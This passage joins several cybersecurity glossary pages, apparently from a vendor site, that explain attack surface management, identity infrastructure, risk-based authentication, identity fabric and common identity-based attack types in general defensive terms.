organizations with regulatory compliance requirements, ASM provides documentation and reporting to demonstrate risk management practices. Solutions track assets, vulnerabilities, and remediation in an auditable format. This reporting can help organizations comply with standards like PCI DSS, HIPAA, and GDPR. ASM gives an overview of the current security posture at any point in time and a historical record of risk and remediation. Core Functions of Attack Surface Management Attack Surface Management (ASM) involves several core functions to help organizations identify, monitor, and reduce their attack surface. Discovery The discovery phase focuses on identifying an organization's digital assets, including hardware, software, and services. This involves scanning networks to find connected devices and cataloging details about the operating systems, applications, and services running on them. The discovery process aims to create an inventory of all assets that could be potential targets for cyber attacks. Testing Penetration testing and vulnerability assessments are used to identify weaknesses in an organization's IT infrastructure and software. Ethical hackers will attempt to compromise systems and gain access to data to determine how attackers could exploit vulnerabilities. The testing process highlights risks that need to be addressed to strengthen security. Context The context function examines how identified assets relate to business operations and assesses their importance. Critical data, systems, and infrastructure are prioritized to help determine where resources should be focused. Context also considers how vulnerabilities could be chained together for maximum impact. This helps organizations understand how exposed their critical assets are and the potential consequences of a cyber attack. Prioritization With an understanding of vulnerabilities and risks, organizations can determine which issues need to be addressed first based on the criticality of the affected assets. Prioritization ensures that resources are allocated efficiently to reduce risks in a strategic manner. Factors like severity, exploitability, and business impact are all considered when prioritizing vulnerabilities. Remediation The remediation process involves selecting and implementing solutions to eliminate or mitigate the vulnerabilities identified during the discovery and testing phases. This includes installing software patches, making configuration changes, decommissioning legacy systems, and deploying additional security controls. Remediation aims to methodically reduce an organization's attack surface by fixing weaknesses and improving resiliency. ASM and Its Role in Defeating Attackers Attack Surface Management (ASM) takes a proactive approach to cybersecurity by focusing on vulnerabilities from an attacker's perspective. Rather than waiting to respond to incidents, ASM aims to prevent them in the first place through continuous monitoring and remediation of the attack surface. The attack surface refers to any point in an organization's infrastructure, applications, or end user devices that could be exploited by malicious actors to compromise systems and data. By understanding the attack surface and how it is changing over time, security teams can identify and fix vulnerabilities before attackers have a chance to leverage them. Continuous Mapping and Monitoring ASM relies on automated tools to continuously discover and map the evolving attack surface, including internal and external-facing assets. Monitoring the attack surface ensures new vulnerabilities are detected quickly so they can be prioritized and remediated based on the level of risk. As new assets are added or configurations change, the tools rescan to update the organization's attack surface map. Prioritizing Risks That Matter Not all vulnerabilities pose the same level of risk. ASM helps organizations focus on fixing serious weaknesses first by evaluating vulnerabilities based on factors like: Severity (how much damage could be caused if exploited) Exploitability (how easy it is for attackers to leverage the vulnerability) Exposure (whether the vulnerability is externally facing) Asset criticality (how important the vulnerable system is) By prioritizing vulnerabilities in this way, security teams can allocate resources to address the risks that matter most. Reducing the Window of Opportunity Attackers often exploit vulnerabilities within days or even hours of their disclosure. ASM aims to shrink the window of opportunity by enabling organizations to quickly identify and remediate serious weaknesses. The faster vulnerabilities can be fixed, the less time attackers have to leverage them for malicious purposes like infiltrating networks, stealing data, or holding systems for ransom. In summary, ASM takes a proactive and risk-based approach to security that focuses on vulnerabilities from an attacker's perspective. By continuously monitoring the attack surface, security teams can identify and fix critical weaknesses before they are exploited. This helps reduce risk and close the window of opportunity for attackers. How to Identify Your Organization's Attack Surface To effectively manage an organization's attack surface, IT and cybersecurity professionals first need to identify what constitutes that surface. An organization's attack surface encompasses all the vulnerabilities and weaknesses that malicious actors could potentially exploit to compromise systems and data. The attack surface includes both external-facing and internal components. Externally, the attack surface consists of the organization's online presence, including its website(s), web applications, and any other internet-connected systems. These provide potential entry points for cybercriminals to gain access to networks and data. Internally, the attack surface includes all networked systems, servers, endpoints, applications, and databases within the organization. Vulnerabilities in any of these components could be leveraged to pivot deeper into networks or access sensitive information. Some of the specific assets that make up an organization's attack surface include: Public IP addresses and domains Email servers and accounts VPNs and other remote access systems Firewalls, routers, and other network infrastructure Physical access control systems Employee endpoints like laptops, desktops, and mobile devices Internal applications and databases Cloud infrastructure and services IoT and OT devices To identify the full attack surface, IT and cybersecurity teams should conduct regular audits and assessments of all internal and external systems and components. Vulnerability scanning tools can help automate the discovery of vulnerabilities and misconfigurations across the organization. Penetration testing and red team exercises also provide valuable insights into potential attack vectors and entry points. Continuously monitoring the attack surface is key to minimizing risks. As the organization's infrastructure, applications, and workforce evolve, new vulnerabilities and security gaps may emerge. Proactively identifying these changes helps ensure the attack surface remains as small as possible. Best Practices for Managing Your Attack Surface To effectively manage an organization's attack surface, cyber security professionals recommend several best practices. First, conduct routine audits and assessments of the attack surface. This includes identifying all internet-facing assets like servers, cloud resources, and web applications. It also means finding vulnerabilities that could be exploited as well as sensitive data that needs protection. Regular attack surface assessments allow organizations to gain visibility into the scope of their digital footprint and prioritize risks. Second, minimize the attack surface area when possible. This can be done by removing unused internet-facing assets, closing down vulnerable ports and protocols, and implementing the principle of least privilege to limit access. Reducing the number of entry points and access helps cut down opportunities for compromise. Third, continuously monitor the attack surface for changes and emerging threats. New assets, accounts, and software get added frequently, and vulnerabilities are discovered all the time. Constant monitoring, along with tools like security information and event management (SIEM) solutions, can quickly detect modifications to the attack surface and new risks. Organizations can then respond promptly to address them. Fourth, enforce strong security controls and risk mitigation. This includes implementing multi-factor authentication, keeping systems and software up to date with the latest patches, restricting access to sensitive data, and training users on security best practices. Robust controls significantly reduce vulnerabilities and the impact of potential attacks. Finally, communicate attack surface management policies and procedures to all relevant personnel. Everyone, from C-level executives to IT administrators to end users, must understand their role in identifying and managing the attack surface. Promoting a culture of shared responsibility for cyber risk mitigation helps to shrink the overall attack surface. Following these recommendations can help organizations take a proactive approach to attack surface management. Regular assessment, monitoring, control, and communication are all required to gain visibility and minimize vulnerabilities across the digital footprint. With diligent effort, companies can identify and fix weaknesses before they are exploited. What is External Attack Surface Management? External Attack Surface Management (EASM) refers to the process of identifying, analyzing, and securing the exposed assets and vulnerabilities of an organization that are accessible... --- - Published: 2024-01-14 - Modified: 2025-08-21 - URL: https://www.silverfort.com/glossary/identity-infrastructure/ The collection of systems, authentication mechanisms, and access control policies enabling secure creation, verification, and management of digital identities within an organization. Identity infrastructure refers to the systems and processes used to manage digital identities and access within an organization. It encompasses identity management systems, authentication mechanisms, and access control policies. As businesses increasingly rely on technology to operate and interact with customers, the ability to verify identities and control access to data and applications has become crucial. Identity infrastructure ensures that only authorized individuals can access sensitive data and that their access is tailored to their specific needs and privileges. Identity management systems create, store, and maintain digital identities. They contain profiles with attributes like names, emails, passwords, and access rights. Authentication mechanisms verify users' identities by checking their credentials, such as usernames and passwords, security keys, or biometrics. Access policies determine who can access which resources. A robust identity infrastructure integrates these elements to provide secure and seamless access to applications and data. It employs strong authentication to verify users in a convenient manner. It grants access based on the principle of least privilege, only providing the minimum level of access needed. It uses identity management to create, modify, and remove access as roles and responsibilities change, increasing the identity security posture of the organization. Role of Identity Infrastructure in Cybersecurity Identity infrastructure has evolved from traditional identity and access management (IAM) focused on internal users and resources to also encompass customer identity and access management (CIAM) for external users accessing web and mobile applications. Modern identity infrastructure must support a variety of authentication methods and federation standards to enable single sign-on across complex IT environments that incorporate on-premises and cloud resources, as well as external partners and customers. Identity infrastructure is crucial for cybersecurity. It underpins secure access to digital resources, enabling organizations to verify users, control access, and monitor activity. Without properly implemented identity infrastructure, organizations cannot securely adopt new technologies like cloud services, mobile devices, and web applications. For these reasons, the framework of Identity Fabric was created. Identity Fabric is a more holistic and integrated approach to managing identities across an organization. It encompasses various identity services and solutions, providing a unified and consistent identity experience across all platforms and environments. The idea is to weave together different identity technologies (like authentication, authorization, and user management) into a cohesive, scalable, and flexible framework. This approach facilitates better user experience, easier management, and enhances security. Role of Identity Segmentation within Identity Fabric Identity Segmentation is a specific strategy or technique within the broader framework of Identity Fabric. It involves dividing or segmenting user access and identities to enhance security and limit potential risks. By implementing identity segmentation, an organization can ensure that users only have access to the resources necessary for their specific roles, minimizing the chance of unauthorized access to sensitive data. In the context of an identity fabric, segmentation becomes an integral part of the overall identity management strategy. It fits within the fabric's goal of providing secure, efficient, and manageable identity solutions. Components of Identity Infrastructure Identity infrastructure refers to the integrated components that establish and govern digital identities. It encompasses authentication, authorization, administration, and auditing which work together to secure access to resources. Authentication Authentication verifies the identity of a user or device trying to access a system. It typically involves a username and password, but can also use multi-factor methods like one-time passwords, biometrics, and security keys. Authentication ensures that only legitimate users and devices can access resources. Authorization Authorization determines what level of access an authenticated identity has. It establishes permissions and privileges by role, group membership, attributes, or other factors. Authorization enforces the principle of least privilege, where users have only the minimum access needed to perform their jobs. Administration Administration manages the lifecycle of digital identities, including account creation, updates, and deprovisioning. Administrative roles control identity stores, set password policies, enable multi-factor authentication, and more. Proper administration is essential to maintain security and compliance. Auditing Auditing tracks key events related to identities and access. It records activities like logins, privilege changes, and resource access requests. Auditing provides visibility into how identities and access are being used so issues can be detected and addressed. Audits should follow the zero trust model by verifying all events explicitly. Together, these components establish a robust identity infrastructure following zero trust principles. They authenticate strictly, authorize minimally, administer properly, and audit continually. A strong identity foundation secures access across today's digital ecosystems, enabling secure collaboration and connectivity. Best Practices for Securing Identity Infrastructure To secure an organization’s identity infrastructure, several best practices should be followed. Implement Single Sign-On Single sign-on (SSO) allows users to access multiple applications with one set of login credentials. SSO reduces the risks associated with weak or reused passwords by limiting the number of credentials needed. It also improves the user experience by streamlining the login process. SSO should be implemented across as many applications as possible. Enable Multi Factor Authentication Multi Factor authentication (MFA) adds an extra layer of security for user logins. It requires not only a password but also another factor like a security code sent to the user's mobile device. MFA helps prevent unauthorized access from stolen credentials. It should be enabled for all users, especially administrators with elevated access privileges. Manage User Roles and Access A role-based access control model should be used to regulate what users can access based on their job functions. Users should only be granted the minimum level of access needed to perform their duties. Regular reviews of user access rights should be conducted to ensure permissions are still appropriate and valid. Excessive or unused access rights should be removed. Monitor Identity Analytics Identity analytics solutions should be leveraged to detect anomalous behavior that could indicate compromised accounts or insider threats. Analytics can identify unusual login times, locations, devices, or access requests. Security teams should regularly review identity analytics reports and investigate risky events. Adjustments may need to be made to authentication policies or user access rights in response. Centralize Identity Management A centralized identity management platform should be used to oversee all users and their access to applications and systems. This provides a single pane of glass view into an organization's identity infrastructure. It ensures consistent policies are applied across resources and simplifies the processes of provisioning, deprovisioning, and auditing users. With a centralized platform, security risks can be mitigated more easily through features like role management, access reviews, and identity governance. Implementing Identity Infrastructure Implementing a modern identity infrastructure requires careful planning and execution. As organizations transition from legacy systems, they must integrate new solutions with existing infrastructure and processes. A strategic approach is key. Develop a Roadmap The first step is creating a roadmap for integrating identity infrastructure across the organization. This roadmap should outline a phased approach, starting with a pilot implementation. The roadmap establishes timelines, budgets, and metrics for success at each stage. It should address integrating with existing systems like HR databases as well as Single Sign-On (SSO) for streamlined user access. A roadmap helps ensure key stakeholders are aligned and major roadblocks are addressed early on. Choose a Starting Point For the initial implementation, select a subset of users and applications to include, such as employees accessing cloud apps. This focused start allows organizations to deploy the new solution, work out any issues, and build expertise before expanding to additional use cases. Starting small also makes the process more manageable, increasing the likelihood of success. Organizations can then build on early wins to gain buy-in for wider deployment. Provide User Education Educating users is essential for successful adoption of new identity infrastructure. Whether the solution is for employees, customers or partners, organizations must communicate how and why the new system is being implemented. They should outline any impacts to users, like password or login changes, and provide resources for help. Targeted education, especially for pilot groups, helps users feel prepared and invested in the solution. Monitor and Optimize After initial deployment, continued monitoring and optimization are required. Organizations should track metrics like user adoption, login times, and security incidents to ensure the solution is performing as intended. They can then make adjustments to improve the user experience, close any vulnerabilities, and expand functionality. Monitoring also provides data to build the business case for further investment in identity infrastructure. Security, Regulatory and Insurance Compliance Security Compliance Identity infrastructure enables organizations to control access to data and applications. By implementing identity management best practices like multi-factor authentication, strong password requirements, and user provisioning and deprovisioning, organizations can securely manage access and help meet security compliance standards like GDPR, HIPAA, and PCI-DSS. Regulatory Compliance Regulations like GDPR, HIPAA, and PCI-DSS require organizations to control access to personal data and implement safeguards to protect information. Identity infrastructure allows organizations to: Manage user access and entitlements Track user access for auditing Implement separation of duties Disable access for terminated users Review user access rights regularly By automating identity management processes, organizations can efficiently meet regulatory compliance requirements. Cyber Insurance Cyber insurance policies require organizations to follow best practices for access management and identity governance. Identity infrastructure demonstrates to insurance providers that an organization has strong controls in place to reduce risk. This may allow the organization to get more comprehensive coverage at a lower cost. Identity Infrastructure Trends and Innovations As cyber threats become more sophisticated, identity infrastructure must evolve to provide enhanced security. Several trends are shaping the future of identity infrastructure. Zero trust security is an approach that assumes there is no implicit trust granted to assets or user accounts based solely on their physical or network location. Zero trust security verifies anything and everything trying to connect to its systems before granting access. This "never trust, always verify" approach is becoming increasingly popular for identity infrastructure. Implementing zero trust security requires strong authentication methods like multi-factor authentication to verify users. Biometrics, like fingerprint or facial recognition, provide a unique way to authenticate users based on their physical characteristics. Biometric authentication is very difficult to spoof and helps prevent identity theft. More organizations are incorporating biometric authentication into their identity infrastructure. However, privacy concerns exist around the storage and use of biometric data. Regulations like GDPR place restrictions on how biometric data can be collected and stored. Federated identity management enables users to use the same set of login credentials to access resources across multiple organizations or domains. This reduces the number of passwords users have to manage and enables single sign-on experiences. Standards like OpenID Connect and OAuth enable federated identity management and are being increasingly adopted. The decentralization of identity infrastructure is an emerging trend. Blockchain technology and self-sovereign identity models give users more control over their digital identities. However, decentralized identity infrastructure is still quite new and standards are still emerging. Widespread adoption may take time. Conclusion As more services and applications move to the cloud and remote work becomes more common, identity infrastructure ensures only authorized users can access the systems and data they need. When done well, it improves productivity and collaboration while reducing risk. However, if not implemented correctly, identity infrastructure can create vulnerabilities that malicious actors actively target. IT and security leaders must make identity infrastructure a priority, gain a thorough understanding of its components and best practices, and invest in robust solutions to authenticate and authorize users in a secure manner. --- - Published: 2024-01-14 - Modified: 2025-08-21 - URL: https://www.silverfort.com/glossary/risk-based-authentication/ A dynamic authentication method that assesses contextual risk factors—such as location, device, and behavior—in real time and adjusts authentication strength accordingly. Risk-based authentication (RBA) is an authentication method that evaluates the level of risk associated with a login attempt or transaction and applies additional security measures when the risk is high. Instead of a static one-size-fits-all approach, risk-based authentication evaluates dozens of data points in real time to establish a risk score for each user action. Based on the risk score, the system can then apply adaptive access controls to verify the user's identity. RBA, also known as Risk-based Conditional Access, provides an alternative to static authentication methods by introducing a dynamic element that adjusts security controls based on the real-time, calculated risk of a transaction. RBA evaluates details about the user, device, location, network, and other attributes to detect anomalies that could signal fraud. If the risk score exceeds a defined threshold, the system may prompt for additional authentication factors like one-time passwords, push notifications, or biometric validation. RBA aims to strike a balance between security and user experience. For low-risk transactions, it allows users to authenticate with a single factor like a password. But for higher risk transactions, it applies stronger authentication to verify the user's identity before allowing access. This risk-appropriate approach helps reduce fraud while minimizing unnecessary friction for legitimate users. How Risk-Based Authentication Works Risk-based authentication (RBA) leverages machine learning and analytics to determine the level of risk for a given access request or transaction. It evaluates multiple factors like user identity, login location, time of access, device security posture, and previous access patterns to detect anomalies that could indicate fraud. Based on the assessed risk level, RBA applies adaptive authentication controls, requiring stronger verification for higher-risk scenarios. RBA solutions typically use a risk score that is calculated in real time for each access request or transaction. The score is determined based on rules and models built from historical data. If the score exceeds a predefined threshold, the system may prompt for additional authentication checks like security questions or OTP verification codes sent to a trusted device. For very high scores, the system can block the request altogether to prevent unauthorized access. By analyzing numerous risk signals, RBA aims to strike a balance between security and user experience. It avoids subjecting users to overly stringent authentication steps when the risk appears normal. At the same time, it is able to detect subtle threats that rule-based systems may miss. RBA systems continue learning and adapting to changes in user behavior and access patterns over time. As the algorithms ingest more data, the risk models and thresholds become more accurate. RBA is a key component of a robust identity and access management (IAM) program. When combined with strong authentication methods like multi-factor authentication (MFA), it provides an additional layer of protection for securing access to critical applications, systems and data. For organizations, RBA helps reduce fraud losses and compliance penalties while improving operational efficiency. For end users, it results in a streamlined authentication experience when risk levels are low. The Evolution of Authentication Methods Authentication methods have evolved over time to address emerging threats and leverage new technologies. Originally, knowledge-based methods like passwords were the primary means of verifying a user's identity. However, passwords are prone to brute force attacks and users often choose weak or reused passwords that are easily compromised. To address the weaknesses of passwords, two-factor authentication (2FA) was introduced. 2FA requires not only knowledge (a password) but also possession of a physical token like a key fob that generates one-time codes. 2FA is more secure than passwords alone but physical tokens can be lost, stolen or hacked. More recently, risk-based authentication (RBA) has emerged as an adaptive method that evaluates each login attempt based on the level of risk. RBA utilizes artificial intelligence and machine learning to analyze dozens of variables like IP address, geolocation, time of access and more to detect anomalies that could indicate fraud. If the login appears risky, the user may be prompted for additional verification like a one-time code sent to their phone. However, if the login is from a recognized device and location, the user can proceed without interruption. RBA offers a number of benefits over traditional authentication techniques: It is more convenient for users by reducing unnecessary prompts for additional verification. Low-risk logins proceed seamlessly while high-risk logins trigger further authentication. It helps prevent fraud by detecting suspicious login attempts that may indicate account takeover or other malicious activity. RBA uses machine learning models that improve over time as more data is analyzed. It provides a better overall user experience by balancing security and convenience. Users are only prompted for additional verification when truly necessary based on the level of risk. It allows security teams to customize authentication policies based on the sensitivity of data or applications. More sensitive systems may require additional verification for even moderately risky logins. RBA is a promising new approach to authentication that leverages AI and risk analysis for adaptive security. As threats continue to evolve, RBA will play an increasingly important role in protecting online accounts and sensitive data. The Benefits of Risk-Based Authentication RBA provides several advantages over static authentication methods. First, it improves the user experience by reducing friction for low-risk logins. Users don’t have to enter additional credentials or complete extra steps if the system determines they are logging in from a recognized device or location during normal hours. This convenience encourages user adoption of authentication methods and limits frustration. Second, RBA strengthens security where needed by requiring stronger authentication for higher-risk logins, such as from an unknown device or location or at an unusual time of day. The additional authentication, which may include a security code sent to the user’s phone or an app notification, helps verify the user’s identity and reduces the chances of fraud. Stronger authentication only kicks in when the risk level warrants it, balancing security and usability. Finally, RBA saves organizations time and money. Help desk resources aren’t drained by users who have been unnecessarily locked out of their accounts. And by reserving the strongest authentication for risky logins, companies can avoid implementing overly stringent controls across the board, which reduces costs. RBA also cuts down on false positives, minimizing wasted efforts investigating legitimate user logins flagged as anomalous. RBA offers a smart, tailored approach to authentication that helps companies optimize security, user experience, and costs. By focusing additional controls where risks are highest, organizations can achieve the right level of authentication based on need, not an arbitrary one-size-fits-all policy. Implementing a Risk-Based Authentication Solution Implementing a risk-based authentication solution requires careful planning and execution. To begin, organizations must identify their most critical data, systems, and resources. A risk assessment helps determine vulnerabilities and the likelihood of compromise. Understanding potential threats and impacts allows companies to focus security controls where needed most. A successful risk-based authentication deployment relies on quality data and advanced analytics. Sufficient historical data about users, access patterns, locations, and devices provides a baseline for normal behavior. Machine learning models can then detect meaningful deviations to calculate accurate risk scores. However, risk scoring models require ongoing tuning as false positives and false negatives emerge. Data scientists must continually retrain models to minimize authentication errors. Integration with Existing Systems Risk-based authentication solutions must integrate with a company's existing identity and access management infrastructure. This includes connecting to directories like Active Directory to access user profiles and roles. Integration with a security information and event management (SIEM) platform provides additional data to inform risk scoring. Application program interfaces (APIs) allow risk-based authentication services to communicate with and enhance native login systems. To implement risk-based authentication, organizations need a dedicated team to manage the solution. Data scientists develop and optimize risk scoring models. Security analysts monitor the system, address alerts, and remediate issues. Administrators maintain the underlying infrastructure and integration with existing systems. With the proper resources and planning in place, risk-based authentication can provide an adaptive security control to protect critical data and resources. The Future of Risk-Based Authentication Risk-based authentication is an evolving field that will likely see continued advancements to strengthen security while improving user experience. Some possibilities on the horizon include: Biometrics and behavior analytics. Biometric methods like fingerprint, face, and voice recognition are becoming more sophisticated and ubiquitous, especially on mobile devices. Analyzing a user’s typing speed, swiping patterns, and other behaviors may also enhance risk scoring. Multi-factor authentication using biometrics and behavior analytics could provide very strong protection. Artificial intelligence and machine learning. AI and machine learning are being applied to detect increasingly complex patterns that indicate fraud. As systems collect more data over time, machine learning algorithms can become extremely accurate at spotting anomalies. AI may also be used to dynamically adjust risk scores and select authentication methods based on the latest threats. Decentralized and blockchain-based systems. Some companies are developing authentication systems that do not rely on a central repository of user data which could be a target for hackers. Blockchain technology, which powers cryptocurrencies like Bitcoin, is an example of a decentralized system that can be used for authentication. Users could have more control over their digital identities and personal information. While risk-based authentication is not a silver bullet, continuous progress in these and other areas will make accounts even more impervious to takeover and help prevent various types of fraud. As methods of authentication and risk analysis advance, accounts should become very difficult for attackers to compromise without the proper credentials or behavior patterns. The future of risk-based authentication looks promising in the never-ending battle against cyber threats. Overall, risk-based authentication will likely continue maturing into an multifactor solution that is both highly secure and seamless for end users to navigate. Conclusion Implementing a comprehensive risk-based authentication strategy helps ensure user access is authenticated to an appropriate level of confidence, enabling secure access while also maximizing usability and productivity. With risk-based authentication, organizations can apply "just enough, just in time" authentication tailored to the unique risk factors of each access scenario. --- - Published: 2023-12-27 - Modified: 2025-08-21 - URL: https://www.silverfort.com/glossary/identity-fabric/ A unified, interconnected IAM architecture that dismantles siloed identity systems to centrally coordinate provisioning, authentication, and access governance across hybrid environments. Identity fabric is a new approach to identity and access management (IAM) that aims to overcome the challenges posed by existing silos between various IAM and identity security solutions. Traditional IAM solutions often involve disparate systems that may not communicate effectively with each other, leading to inefficiencies and potential security vulnerabilities. Identity fabric seeks to provide a unified and interconnected framework for managing identities across an organization. An Identity Fabric solution delivers a holistic view of user identities, access rights, and account activities. It streamlines provisioning, authentication, and authorization of users and their access to resources across on-premises and cloud environments. With an Identity Fabric, organizations can take a coordinated approach to identity governance. User lifecycle events like hiring, termination, promotion or role changes can be managed centrally. Consistent identity access policies and controls are applied across systems, reducing risk. An Identity Fabric also enables advanced identity analytics and intelligence. User behaviors and access patterns are monitored to detect anomalies that could indicate compromised accounts or insider threats. Analytics provide visibility into how access rights accumulate over time and where privileges have spread broadly, so organizations can remediate excessive access. How Identity Fabric Works to Protect User Identities Identity Fabric is an identity and access management (IAM) architecture that integrates multiple IAM solutions into a unified system. It enables organizations to centrally manage user identities and control access to resources across environments such as cloud services, Active Directory or other directory services. The key components of an Identity Fabric include: Identity management systems - Systems that create, store and manage user identities and access. This includes solutions for managing passwords, multi-factor authentication, user profiles, roles and permissions. Access management - Controls and monitors user access to resources across the organization. It ensures users have appropriate access based on their job function and enforces security policies. User authentication - Verifies users are who they claim to be when accessing resources. This includes passwords, multi-factor authentication methods like biometrics, security keys and one-time passwords. User provisioning - Automates the process of creating, updating and deactivating user accounts across all connected systems and applications based on a single source of truth. Audit and compliance - Monitors user access and activity to detect anomalies, ensure compliance with regulations and prevent violations of security policies. It provides logging, monitoring and reporting capabilities. Federated identity - Allows identities from one domain to be used to access resources in another domain. It provides single sign-on across security domains through secure identity federation standards like SAML, OpenID Connect and SCIM. By consolidating identity data and unifying identity management processes, Identity Fabric reduces risks associated with “identity sprawl” – the proliferation of duplicate, outdated or unauthorized user accounts spread across IAM solutions. It helps ensure only authorized individuals have access to resources, and access is removed promptly when no longer needed. Benefits of Implementing Identity Fabric for Identity Protection Implementing an Identity Fabric provides several key benefits for organizations looking to enhance their identity protection and streamline access management. Enhanced Security and Compliance An Identity Fabric helps organizations strengthen security by providing a centralized access control system. It enables role-based access control, multi-factor authentication, and user provisioning to ensure only authorized users gain access to systems and data. This also aids in meeting compliance regulations like GDPR and CCPA by facilitating data access transparency and consent. Improved Scalability As organizations adopt more applications and services, managing users and access across systems becomes increasingly complex. An Identity Fabric provides a single platform to manage access across all applications, whether on-premises or in the cloud. This simplifies access management at scale and reduces the resources required to onboard new applications and manage users. Optimized User Experience With an Identity Fabric, users benefit from a seamless experience across systems. They only need to sign in once to access everything they need to do their jobs. The Identity Fabric automatically provisions and deprovisions access as needed based on a user's role. This minimizes disruption for users when responsibilities change or they join/leave the organization. Increased Operational Efficiency For IT teams, an Identity Fabric reduces manual work by automating access management workflows. This includes automated provisioning/deprovisioning, access reviews, and role changes. Teams gain a centralized view of access across the organization, enabling them to easily monitor for issues, make adjustments, and ensure compliance. Overall, an Identity Fabric allows IT teams to focus on high-priority, strategic initiatives rather than repetitive access management tasks. Implementing Identity Fabric for Enhanced Security To implement an Identity Fabric architecture, an organization must have a thorough understanding of their data, applications, devices, and users. An Identity Fabric weaves together disparate identity systems into a single, integrated identity plane across the IT environment. The first step is conducting an inventory of digital identities across systems. This includes user accounts, service accounts, credentials, authentication methods, and access policies. With a comprehensive inventory, organizations can map identities and access, identify redundant or obsolete accounts, and spot potential vulnerabilities. Next, organizations determine a strategy for integrating identities. This may include consolidating redundant accounts, implementing strong authentication, and employing automated provisioning and deprovisioning. Single sign-on (SSO) and multi-factor authentication (MFA) are commonly used to strengthen identity security. SSO provides one set of login credentials to access multiple applications. MFA adds an extra layer of authentication for logins and transactions. To build the Identity Fabric, organizations deploy an identity management solution that acts as an identity hub, connecting disparate systems. The identity hub enforces consistent access policies, provides a single pane of glass for identity governance, and employs machine learning and behavioral analysis to detect anomalous activity. With the identity hub in place, organizations can weave in additional capabilities over time, such as privileged access management, identity analytics, and cloud identity federation. An Identity Fabric enables enhanced visibility and control over identities and access. It reduces risks from compromised credentials, insider threats, and external attacks by eliminating identity silos, strengthening authentication, and using advanced analytics. For organizations pursuing digital transformation, an Identity Fabric is essential for managing identities at scale, ensuring compliance, and maintaining a robust security posture. With a mature Identity Fabric, organizations can make identities the foundation for a zero trust security model. Identity Fabric and Zero-Trust Architecture Identity Fabric builds a strong, multifactor foundation for identity assurance and access management. Paired with Zero Trust architecture, it allows organizations to securely enable digital transformation, support remote workforces at scale and gain visibility across complex IT ecosystems. The Zero Trust model operates on the principle of “never trust, always verify. ” It requires rigorous identity verification for every user and device trying to access resources. Identity Fabric provides the robust, continuous authentication and authorization Zero Trust demands. Its AI-powered identity assessments enable granular, contextual access policies based on the risk levels of users and devices. This helps organizations balance security and user experience. Identity Fabric vs. Identity Infrastructure Identity Fabric is a more holistic and integrated approach to managing identities across an organization. It encompasses various identity services and solutions, providing a unified and consistent identity experience across all platforms and environments. The idea is to weave together different identity technologies (like authentication, authorization, and user management) into a cohesive, scalable, and flexible framework. This approach facilitates better user experience, easier management, and enhances security. On the other hand, Identity Infrastructure term refers to the underlying framework or systems that support identity management within an organization. It includes the hardware, software, policies, and procedures necessary for creating, maintaining, and managing digital identities and access rights. Identity Infrastructure is the foundation on which identity segmentation and the identity fabric are built and operationalized. Identity Fabric vs. Converged Identity While related, Identity Fabric and converged identity are distinct concepts. Converged identity refers to bringing separate user stores together into a single identity repository. Identity Fabric takes this a step further by connecting and correlating identities across the entire IT infrastructure. An Identity Fabric builds on top of a converged identity system by layering on components for managing access, authentication, provisioning and security. In short, a converged identity is a prerequisite for building an Identity Fabric. Identity Fabric provides a comprehensive approach to identity management that spans across organizations’ networks, data centers, clouds, applications, and devices. It gives security teams a holistic view of users’ identities and access, enabling stronger security, governance and compliance. By connecting identities across IT systems, Identity Fabric reduces redundancy, improves productivity and delivers a better user experience. Conclusion With the rapid adoption of cloud computing and mobile technologies, identity has become one of the most critical components of cybersecurity. As organizations move away from the traditional network perimeter and embrace a zero-trust security model, identity has become the new perimeter. An identity fabric stitches together disparate identity systems into a single cohesive framework, providing a holistic view of users, their access, and their entitlements across the organization. For cybersecurity and IT professionals, understanding identity fabric and how to implement it is crucial to navigating today's decentralized networks and protecting critical data and systems. --- - Published: 2023-12-11 - Modified: 2025-08-21 - URL: https://www.silverfort.com/glossary/identity-based-attacks/ Cyberattacks that exploit compromised credentials to misuse legitimate authentication paths, enabling attackers to evade detection and access both on‑premises and cloud resources. Identity based attacks make use of user’s compromised credentials for malicious access. They differ from malware-based attacks in that they employ the legitimate authentication process for accessing resources, with no malicious code required. Some expand the definition and include in it also attack stages that facilitate this unauthorized access, such as credential compromise and privilege escalation. Identity-based attacks can target both human and non-human identities. The goal of identity based attacks is to access on-prem and cloud resources by impersonating legitimate users. Once threat actors have stolen login information, they can masquerade as authorized users and gain access to resources. These attacks are difficult to detect since the compromised accounts already have permission to access systems and data. Identity based attacks continue to grow in sophistication and scale. Organizations must implement strong security controls like multi-factor authentication, employee education, and account monitoring to help reduce risks from these threats. With vigilance and a proactive identity security posture, the impact of identity based attacks can be minimized. How Identity Based Attacks Work Identity-based attacks target individuals by compromising their personal data and digital identities. Hackers employ various techniques/vectors to steal usernames, passwords, social security numbers, and other sensitive information that can then be used to impersonate victims for financial gain or other malicious purposes. Phishing Phishing is a common tactic where attackers send fraudulent emails or text messages posing as a legitimate company or service to trick recipients into providing login credentials, account numbers, or installing malware. Spearphishing targets specific individuals, appearing to come from someone they know. Whaling targets high-profile executives. Keylogging Keylogging software secretly tracks the keys pressed on a keyboard, recording usernames, passwords, credit card numbers, and other sensitive data. Keyloggers can be installed by phishing emails, infected external storage devices, or by exploiting software vulnerabilities. Social Engineering Social engineering aims to manipulate people into divulging confidential information or performing actions that enable system access. Attackers may impersonate IT support staff, claim there is a technical issue that requires account access or trick victims into clicking malicious links by appearing to come from a friend or colleague. Credential Stuffing Credential stuffing uses automated tools to test stolen username and password combinations on different websites and services. Billions of compromised credentials from major data breaches are available on the dark web. Hackers employ credential stuffing to find accounts where people reuse the same login information. Biometric Spoofing As multi factor authentication becomes normalized, biometric spoofing, where attackers falsify biometric data to access privileged accounts, has also emerged as an attack vector . Why Are Identity-Based Attacks Important? Identity-based attacks target an individual's personally identifiable information (PII) and login credentials. These attacks are significant because they can have major impacts on both individuals and organizations. For individuals, identity theft and account takeovers can lead to financial loss, damaged credit, and compromised personal information. Criminals use stolen identities and accounts to make unauthorized purchases, apply for loans, file fraudulent tax returns, and more. For organizations, identity-based attacks pose risks to customer data, intellectual property, and financial assets. Hackers frequently target corporate accounts and networks to gain access to sensitive data and funds. Successful attacks can undermine consumer trust and negatively impact a company’s reputation and brand. Once attackers gain initial access, they will try to move laterally across networks to access additional systems and accounts. They leverage the permissions and trust of the originally compromised account to access more sensitive data and gain greater control. Lateral movement is an advanced technique that often requires stealth to avoid detection. Regulations like the General Data Protection Regulation (GDPR) and California Consumer Privacy Act (CCPA) hold organizations responsible for safeguarding personal data and responding to identity-based attacks. Failure to comply with these regulations can result in significant financial penalties. Protecting Against Identity Based Attacks Protecting against identity-based attacks requires a multi-pronged approach. Organizations should implement comprehensive security awareness training to educate employees about phishing emails, social 